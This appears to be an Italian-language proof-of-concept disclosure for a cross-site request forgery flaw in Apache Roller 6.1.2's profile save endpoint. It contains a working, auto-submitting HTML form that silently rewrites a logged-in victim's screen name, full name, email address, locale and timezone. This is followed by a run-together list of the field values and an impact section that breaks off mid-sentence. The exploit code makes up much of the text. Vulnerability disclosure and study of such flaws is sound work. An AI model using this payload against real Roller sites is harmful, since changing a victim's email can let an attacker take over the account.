
Exploit PoC per una vulnerabilità CSRF nell'endpoint di aggiornamento del profilo di Apache Roller v6.1.2. Include il codice exploit in HTML per dimostrare modifiche non autorizzate al profilo.
È stato scoperto che Roller v6.1.2 e versioni precedenti contengono una vulnerabilità di Cross-Site Request Forgery (CSRF) nell'endpoint /roller/roller-ui/profile!save.rol.
Questa vulnerabilità consente agli attaccanti di aggiornare arbitrariamente le informazioni del profilo dell'utente vittima (ad es. email, nome completo, lingua, fuso orario) tramite una pagina HTML appositamente predisposta.
La vulnerabilità consente richieste non autorizzate a /roller/roller-ui/profile!save.rol che aggiornano il profilo dell'utente senza protezione CSRF.
<html>
<head>
<form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
<input name="bean.userName" value="vanlam" type="hidden">
<input name="bean.screenName" value="hacked" type="hidden">
<input name="bean.fullName" value="hacked" type="hidden">
<input name="bean.emailAddress" value="[email protected]" type="hidden">
<input name="bean.passwordText" value="" type="hidden">
<input name="bean.passwordConfirm" value="" type="hidden">
<input name="bean.locale" value="vi_VN" type="hidden">
<input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
</form>
<script>
document.getElementById('exploitForm').submit();
</script>
</head>
</html>
bean.userName: vanlambean.screenName: hackedbean.fullName: hackedbean.emailAddress: [email protected]bean.passwordText: (vuoto)bean.passwordConfirm: (vuoto)bean.locale: vi_VNbean.timeZone: Asia/BangkokUn attaccante può creare una pagina HTML dannosa che, quando viene visitata da un utente Roller autenticato, invia automaticamente un modulo per aggiornare le informazioni del profilo della vittima senza il suo consenso. Ciò può comportare: